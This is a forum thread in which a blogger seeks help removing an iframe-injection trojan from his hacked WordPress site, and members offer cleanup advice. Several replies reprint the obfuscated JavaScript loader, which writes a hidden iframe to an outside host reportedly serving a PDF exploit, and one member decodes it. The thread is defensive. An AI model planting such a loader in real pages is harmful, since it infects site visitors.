37 {{ upvoteCount | shortNum }}
37 {{ upvoteCount | shortNum }}

Need Help Killing This

by Steven Wagenheim
30 replies
Well, it finally happened. My blog has been hacked.

I received this message when I tried to open my blog just now

The requested URL could not be retrieved

While trying to retrieve the URL:



The following error was encountered:

The requested object is INFECTED with the following viruses: HEUR:Trojan.Script.Iframer

This was reported by Kaspersky. Anybody know how to remove it?

Thanks.
#rid #trojan
  • Profile picture of the author Gene Pimentel
    Sorry this has happened to you Steven! Don't know if this will help, but check:

    Kaspersky Lab Forum > HEUR: TROJAN.Script.Iframer
    {{ DiscussionBoard.errors[503958].message }}
  • Profile picture of the author R Hagel
    I think you should edit your link out of this post and your profile, just so no one clicks there until you get the virus situation straightened out.
    {{ DiscussionBoard.errors[503971].message }}
    • Profile picture of the author Steven Wagenheim
      Originally Posted by R Hagel View Post

      I think you should edit your link out of this post and your profile, just so no one clicks there until you get the virus situation straightened out.
      Thanks...didn't think of that.

      If anybody has a clue how to fix this I'd be extremely grateful.
      Signature
      {{ DiscussionBoard.errors[503976].message }}
      • Profile picture of the author zeurois
        Originally Posted by Steven Wagenheim View Post

        Thanks...didn't think of that.

        If anybody has a clue how to fix this I'd be extremely grateful.
        First check if any of the source files were altered. If so, revert to originals (doing that no matter what won't harm your blog in any way ... if it's not REALLY OLD)

        Secondly, do a scan on your PC.

        Lastly .. if the problem isn't fixed, ask the hosting company to do the same, maybe the server is "delivering" the virus.

        HTH
        Signature
        Boost Your Conversion Rates & Skyrocket Your Sales by Using Scarcity
        {{ DiscussionBoard.errors[503998].message }}
      • Profile picture of the author Ron Douglas
        Originally Posted by Steven Wagenheim View Post

        Thanks...didn't think of that.

        If anybody has a clue how to fix this I'd be extremely grateful.
        That happen to me before when I neglected to upgrade to the latest Wordpress version.
        Now I use the automatic upgrade plugin and it makes it much easier to stay updated.

        To resolve the hack, I had to go through all of the blog files and remove the IFrames and funny links which didn't belong.

        You can compare your current files with the default Wordpress files to see what has been added.
        Signature
        {{ DiscussionBoard.errors[504014].message }}
        • Profile picture of the author Steven Wagenheim
          Originally Posted by Ron Douglas View Post


          You can compare your current files with the default Wordpress files to see what has been added.
          I have absolutely no idea how to do this.
          Signature
          {{ DiscussionBoard.errors[504026].message }}
          • Profile picture of the author Ron Douglas
            Originally Posted by Steven Wagenheim View Post

            I have absolutely no idea how to do this.
            If you want I can have a look at it for you. Send me a PM.
            Signature
            {{ DiscussionBoard.errors[504034].message }}
            • Profile picture of the author Steven Wagenheim
              I just got this reply from the Kaspersky forum. It's not a false positive.

              hello
              it's not a false positive, there's an obfuscated script on that page (i broke a few lines on the script):
              CODE
              fun cti on Decode(){var temp="",i,c=0,out=""; var str="60!105! 102!114!97!109!101!32 !115!114!99!61!34!104!116!116!112!58!47!47!102!105 !108!97!114!109!111!110!46!105!110!102!111!47!100! 111!99!115!47!105!110!102!111!46!104!116!109!108!3 4!32!115!116!121!108!101!61!34!112!111 !115!105!116!105!111!110!58!97!98!115!111!108!117! 116!101!59!32!116!111!112!58!48!59!32!108!101!102! 116!58!48!59!119!105!100!116!104!58!49!112!120!59! 32!104!101!105!103!104!116!58!49!112!120!59!32!118 !105!115!105!98!105!108!105!116!121!58!104!105!100 !100!101!110!59!34!62!60!47!105!102!114!97!109!101 !62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++; out=out+String.fromCharCode(temp);temp="";}documen t.write(out);}Decode();

              that scripts leads to a PDF exploit. to clear it up you need to search through the code and remove the script

              I have no idea where to even begin looking for this.

              Any clues?
              Signature
              {{ DiscussionBoard.errors[504044].message }}
              • Profile picture of the author zeurois
                Cute ftp(if you have) checks and skips the files that have the exact size with the ones on server. You'll be asked to overwrite only few of them (the altered ones)

                Originally Posted by Steven Wagenheim View Post

                I just got this reply from the Kaspersky forum. It's not a false positive.

                hello
                it's not a false positive, there's an obfuscated script on that page (i broke a few lines on the script):
                CODE
                fun cti on Decode(){var temp="",i,c=0,out=""; var str="60!105! 102!114!97!109!101!32 !115!114!99!61!34!104!116!116!112!58!47!47!102!105 !108!97!114!109!111!110!46!105!110!102!111!47!100! 111!99!115!47!105!110!102!111!46!104!116!109!108!3 4!32!115!116!121!108!101!61!34!112!111 !115!105!116!105!111!110!58!97!98!115!111!108!117! 116!101!59!32!116!111!112!58!48!59!32!108!101!102! 116!58!48!59!119!105!100!116!104!58!49!112!120!59! 32!104!101!105!103!104!116!58!49!112!120!59!32!118 !105!115!105!98!105!108!105!116!121!58!104!105!100 !100!101!110!59!34!62!60!47!105!102!114!97!109!101 !62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++; out=out+String.fromCharCode(temp);temp="";}documen t.write(out);}Decode();

                that scripts leads to a PDF exploit. to clear it up you need to search through the code and remove the script

                I have no idea where to even begin looking for this.

                Any clues?
                Signature
                Boost Your Conversion Rates & Skyrocket Your Sales by Using Scarcity
                {{ DiscussionBoard.errors[504047].message }}
      • Profile picture of the author R Hagel
        Originally Posted by Steven Wagenheim View Post

        Thanks...didn't think of that.
        No problem. You should also temporarily strip it out of your sig file.

        Hope you get it fixed without losing too much hair.

        Cheers,
        Becky
        {{ DiscussionBoard.errors[504127].message }}
        • Profile picture of the author Steven Wagenheim
          Originally Posted by R Hagel View Post

          No problem. You should also temporarily strip it out of your sig file.

          Hope you get it fixed without losing too much hair.

          Cheers,
          Becky
          Becky, I've stripped the URL out of my sig and I have support requests
          just about everywhere for this mess including Kaspersky, Wordpress and
          even the guy who takes care of my hosting (he's a warrior) but so far,
          nobody's been able to give me an answer as to how to fix this mess.

          Losing hair? Pffft...not important enough to lose hair over. Worse case
          scenario is I kill the whole blog folder and do a reinstall. My only problem
          will then be how to point the new blog to my existing database. That's
          the only thing I don't know how to do.
          Signature
          {{ DiscussionBoard.errors[504452].message }}
          • Profile picture of the author NMP
            Originally Posted by Steven Wagenheim View Post

            Becky, I've stripped the URL out of my sig and I have support requests
            just about everywhere for this mess including Kaspersky, Wordpress and
            even the guy who takes care of my hosting (he's a warrior) but so far,
            nobody's been able to give me an answer as to how to fix this mess.

            Losing hair? Pffft...not important enough to lose hair over. Worse case
            scenario is I kill the whole blog folder and do a reinstall. My only problem
            will then be how to point the new blog to my existing database. That's
            the only thing I don't know how to do.
            Hi Steve

            Do a new install. Then FTP or go to CPanel filemanager and open
            wp-config.php Replace autoinstaller database details with your old
            once and save wp-config.php or/and upload it again.

            Daniel


            <?php
            // ** MySQL settings ** //
            define('DB_NAME', '--------------); // The name of the database
            define('DB_USER', '--------------'); // Your MySQL username
            define('DB_PASSWORD', '-------'); // ...and password
            define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
            define('DB_CHARSET', 'utf8');
            define('DB_COLLATE', '');
            {{ DiscussionBoard.errors[504516].message }}
      • Profile picture of the author Floyd Fisher
        Originally Posted by Steven Wagenheim View Post

        Thanks...didn't think of that.

        If anybody has a clue how to fix this I'd be extremely grateful.
        It's an iframe, right?

        First off, get ahold of a product called 'crimson editor', you'll thank me for this freebie later.

        Now, download your entire public_html or www folder into a special quarantine folder. Then open up crimson editor, and have it search that folder for any files contaning the word iframe. Then sort through the list it finds for something like this:

        <iframesrc="http://example.com"height="200">
        Alternative text for browsers that do not understand IFrames.
        </iframe>

        As you find 'em nuke 'em by highlighting and deleting the hacked lines of code.

        After you're done, make sure you save the newly disinfected files, and re-upload your wordpress blog back to your website, and make sure you overwrite everything!

        If you don't want to do this, I work for cheap and love to nuke stuff like this. PM me with your ftp access and I'll get to work.
        {{ DiscussionBoard.errors[512728].message }}
  • Profile picture of the author RobinInTexas
    seems like the site is ok from here
    Signature

    Robin



    ...Even if you're on the right track, you'll get run over if you just set there.
    {{ DiscussionBoard.errors[503974].message }}
  • Profile picture of the author Ron Douglas
    Some hosting control panels allow you to do a search through all your files. You may be able grab a piece of the code and do a text search to find the files containing that code.
    Signature
    {{ DiscussionBoard.errors[504048].message }}
    • Profile picture of the author Alan Petersen
      Make sure you click to view hidden files via your FTP client. When this happened to me they slipped a hidden file which deactivated all my plugins so they could spam comment.
      Signature
      {{ DiscussionBoard.errors[504077].message }}
    • Profile picture of the author Anup Mahajan
      Hello Steven,

      Sorry this happened to you.

      Ron, I was going to say the same thing . The first piece of jigsaw is to find the corrupt file and then to fix it.

      I suppose you do take daily backups so that you can revert to older files once you have identified the corrupt file(s).

      Regards,
      Anup
      Signature

      {{ DiscussionBoard.errors[504085].message }}
  • Profile picture of the author zeurois
    Did you even tried what I said?
    Signature
    Boost Your Conversion Rates & Skyrocket Your Sales by Using Scarcity
    {{ DiscussionBoard.errors[504475].message }}
    • Profile picture of the author Steven Wagenheim
      Originally Posted by zeurois View Post

      Did you even tried what I said?
      Yes, I have no idea how to tell what's been altered. And the problem is NOT
      on my PC. My blog was hacked.

      On another note and slightly off topic but I feel relevant, people bitch and
      complain about how IM ebooks are all rehashed garbage.

      Well, how about somebody write a book on how to unhack a WP blog and
      fix this mess?

      I'd buy it right now if it existed.
      Signature
      {{ DiscussionBoard.errors[504515].message }}
  • Profile picture of the author Lloyd Lopes
    Steven

    Wordpress is a bunch of PHP files + htacess which is hooked up to a database.
    You can replace all of the wordpress files with new files , which will overwrite the file with the funny script and clean up your problem without wiping any of your data out.

    Some steps : ( Dont do this if you know some of your code was modified by a coder to make it do some non-standard things - you will know if you did this because you will have asked a coder to do it. )

    1. Open FTP - find wordpress root ( The big file with all the small wordpress files and folders in ) I like : FireFTP - The Free FTP Client for Mozilla Firefox to do this. Enter username , ftp.yoursite.com and password. Download all files to a backup folder ( name it backup ) on desktop.

    2. Download wordpress WordPress › Blog Tool and Publishing Platform Unzip into another folder.

    Upgrading from any previous WordPress to 2.7:
    3. Delete your old WP files. EXCEPT wp-config.php AND wp-content/themes/yourtemplateyouused AND wp-content/plugins if you had any custom plugins installed
    4. Upload the new files.
    5. Point your browser to /wp-admin/upgrade.php. Enter stuff.

    Thats it. If all goes wrong delete everything and upload the old files.
    Signature

    Lloyd

    Need a membership site with paid download sections and restricted content?

    World Niche Domination....Coming Soon - Download Your Free Report Here!

    {{ DiscussionBoard.errors[504530].message }}
    • Profile picture of the author Steven Wagenheim
      Okay, I think I found the problem.

      Somebody put a file core.18300 on my server. I can't delete it. It's giving
      me a permission error. I've tried going in to control panel and changing
      the permissions and I still can't delete it.

      What do I do? Do I need to get my web host to delete this file?
      Signature
      {{ DiscussionBoard.errors[504556].message }}
      • Profile picture of the author Floyd Fisher
        Originally Posted by Steven Wagenheim View Post

        Okay, I think I found the problem.

        Somebody put a file core.18300 on my server. I can't delete it. It's giving
        me a permission error. I've tried going in to control panel and changing
        the permissions and I still can't delete it.

        What do I do? Do I need to get my web host to delete this file?
        More than likely, it's because your host locked it down for you.

        But I would call them highest priortiy and have them nuke that file immediately.
        {{ DiscussionBoard.errors[512731].message }}
      • Profile picture of the author Bishop81
        Originally Posted by Steven Wagenheim View Post

        Okay, I think I found the problem.

        Somebody put a file core.18300 on my server. I can't delete it. It's giving
        me a permission error. I've tried going in to control panel and changing
        the permissions and I still can't delete it.

        What do I do? Do I need to get my web host to delete this file?
        If you're still having this problem, try changing the file name first, and then deleting it.

        You can also try deleting it from the cpanel file manager.
        Signature

        I'm tired of my signature... Deleted.

        {{ DiscussionBoard.errors[513758].message }}
  • Profile picture of the author Britt Malka
    Well, I cannot grasp the problem. Is your blog on a Windows server, or how on earth could it get infected with a trojan or virus?

    You have a webmaster, you say. This should be very easy to fix. Or else PM me.
    Signature
    *** Idea Factory ***
    9 Simple & Fun Ways to Come Up With Ideas for Non-Fiction Books

    >>> Click here to get immediate access <<<
    {{ DiscussionBoard.errors[504555].message }}
  • Profile picture of the author Gene Pimentel
    Yeah, you'll likely have to have your webhost delete that for you. It won't let you delete it because you are not the 'owner' of that file.
    {{ DiscussionBoard.errors[504576].message }}
  • Profile picture of the author JayXtreme
    It's a VERY common hack Steve..

    Check your footer.php file for irregularities.. it is usually found in there..there will be a "call", usually from footer.php to the virus located on your server.. cut out the script that calls it into action and your problem is gone

    Peace

    Jay
    Signature

    Bare Murkage.........

    {{ DiscussionBoard.errors[504578].message }}
    • Profile picture of the author Steven Wagenheim
      Originally Posted by JayXtreme View Post

      It's a VERY common hack Steve..

      Check your footer.php file for irregularities.. it is usually found in there..

      Peace

      Jay
      Thank you Jay. You know, I usually don't wish people any harm. but hackers
      who do this...well, what I wish for them you can't print in a public forum.

      This is not exactly the way I wanted to spend my day.
      Signature
      {{ DiscussionBoard.errors[504583].message }}
      • Profile picture of the author Steven Wagenheim
        One other thing, while I'm trying to fix this mess.

        Recently, somebody has been messing with the permissions on my server. I
        think this is part of the problem. Somebody got in somewhere and was able
        to do this.

        So, question is this. I want to set the permissions for my public_html and
        blog folders.

        What should they be? 644 or 755? I don't remember.

        What do people normally set them to?
        Signature
        {{ DiscussionBoard.errors[504597].message }}
        • Profile picture of the author Britt Malka
          Folders have 755 as default and files 644.

          Sometimes if you cannot delete a file, you can rename it, and later delete it. Or try to change the permissions to 644 and delete it.
          Signature
          *** Idea Factory ***
          9 Simple & Fun Ways to Come Up With Ideas for Non-Fiction Books

          >>> Click here to get immediate access <<<
          {{ DiscussionBoard.errors[505757].message }}
  • Profile picture of the author Ross Dalangin
    Ask for help from your web host and let them check your theme. Change you r passwords, arrange your files from you FTP software based on date and check which files are modified and what other files are added. If you see a writeable folders or files especially (777) then evaluate if the files or folder is really needed that then change it.
    {{ DiscussionBoard.errors[504604].message }}
  • Profile picture of the author Jon Alexander
    Steve, you need to get onto support at your host immediately. The virus could be everywhere, so even if you manage to delete it yourself, it could come back...
    Signature
    http://www.contentboss.com - automated article rewriting software gives you unique content at a few CENTS per article!. New - Put text into jetspinner format automatically! http://www.autojetspinner.com

    PS my PM system is broken. Sorry I can't help anymore.
    {{ DiscussionBoard.errors[504633].message }}
  • Profile picture of the author LB
    This most likely happens when you run an out of date version of Wordpress...problem with being the premiere blogging platform is that exploits spread fast and wide and it's easy to find blogs that aren't updated.

    Sounds like your host may need to get in there and remove the offending files.
    Signature
    Tired of Article Marketing, Backlink Spamming and Other Crusty Old Traffic Methods?

    Click Here.
    {{ DiscussionBoard.errors[506104].message }}
  • Profile picture of the author zeurois
    I don't know if this got fixed but:

    I grabbed that code from a post here ...

    fun cti on Decode(){var temp="",i,c=0,out=""; var str="60!105! 102!114!97!109!101!32 !115!114!99!61!34!104!116!116!112!58!47!47!102!105 !108!97!114!109!111!110!46!105!110!102!111!47!100! 111!99!115!47!105!110!102!111!46!104!116!109!108!3 4!32!115!116!121!108!101!61!34!112!111 !115!105!116!105!111!110!58!97!98!115!111!108!117! 116!101!59!32!116!111!112!58!48!59!32!108!101!102! 116!58!48!59!119!105!100!116!104!58!49!112!120!59! 32!104!101!105!103!104!116!58!49!112!120!59!32!118 !105!115!105!98!105!108!105!116!121!58!104!105!100 !100!101!110!59!34!62!60!47!105!102!114!97!109!101 !62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++; out=out+String.fromCharCode(temp);temp="";}documen t.write(out);}Decode();

    Decoded it ... (i thought it was obfuscated, it wasn't )

    fun cti on Decode()
    {
    var temp = "", i, c = 0, out = "";
    var str = "60!105! 102!114!97!109!101!32 !115!114!99!61!34!104!116!116!112!58!47!47!102!105 !108!97!114!109!111!110!46!105!110!102!111!47!100! 111!99!115!47!105!110!102!111!46!104!116!109!108!3 4!32!115!116!121!108!101!61!34!112!111 !115!105!116!105!111!110!58!97!98!115!111!108!117! 116!101!59!32!116!111!112!58!48!59!32!108!101!102! 116!58!48!59!119!105!100!116!104!58!49!112!120!59! 32!104!101!105!103!104!116!58!49!112!120!59!32!118 !105!115!105!98!105!108!105!116!121!58!104!105!100 !100!101!110!59!34!62!60!47!105!102!114!97!109!101 !62!";
    l = str.length;
    while (c <= str.length - 1)
    {
    while (str.charAt(c) != '!') {
    temp = temp + str.charAt(c ++);
    }
    c++;
    out = out + String.fromCharCode(temp);
    temp = "";
    }
    documen t.write(out);
    }
    Decode();

    and tested it on w3schools ...

    It created an iframe which got to nowhere (404)

    Not Found

    The requested URL /docs/info.html� style= was not found on this server.
    Apache/2.2.3 (CentOS) Server at filarmon.info Port 80
    but ... the URL it pointed to is

    http://filarmon.info/docs/info.html%EF%BF%BD%20style=
    Signature
    Boost Your Conversion Rates & Skyrocket Your Sales by Using Scarcity
    {{ DiscussionBoard.errors[506533].message }}
  • Profile picture of the author jerson
    do a back up regularly . I think u shud contact ur host bout this
    {{ DiscussionBoard.errors[506585].message }}
  • Profile picture of the author tiffanymor4you
    Steve, I think you need to take a trip over to the wicked fire forum. You are quite popular over there and they have thread devoted to you. Just sign up if you aren't a member and do a seach for your last name to find the threads. They've been talking about you for some time and I just noticed that they are now reporting the hack to your web site.
    {{ DiscussionBoard.errors[512686].message }}
  • Profile picture of the author NewbiesDiary
    i havent read all the replies, so sorry if someone has already suggested this...

    I hadn't updated the forum version on my dirt bike site, and someone hacked it and put all kinds of shit on it - so bad that my site had the warning under it on all the google pages.

    I got onto my host and explained to them and they found all the crap and cleaned it all off for me - and they didn't charge me either - it only took them an hour or so to do it and they were great, but I did do the "Oh my gosh, I'm such a girl" thing LOL - give that a try Steven hehe.

    Good luck
    {{ DiscussionBoard.errors[512751].message }}
  • Profile picture of the author Ken Shorey
    Steve,

    "core.*" files are related to PHP or other code crashing while running a script on your site.

    You said in another thread that you had tried to update wordpress using the automatic updater plugin and it didn't work. Maybe that created the .core file.
    {{ DiscussionBoard.errors[513327].message }}
  • Profile picture of the author JonathanBoettcher
    Hi Steve - looks like there's plenty of people trying to help you solve the problem, but all I can do is tell you what I do to try to prevent these types of things...

    I've installed the Login Lockdown plugin on all my blogs - the idea is to prevent anyone from hacking in. I suppose they could have gotten into your system through a different means as well, but this should help with some of that.

    free download is here: Bad Neighborhood - Login LockDown WordPress Security Plugin
    Signature

    Discover My Effective Backlinking Strategies...

    {{ DiscussionBoard.errors[513778].message }}

Trending Topics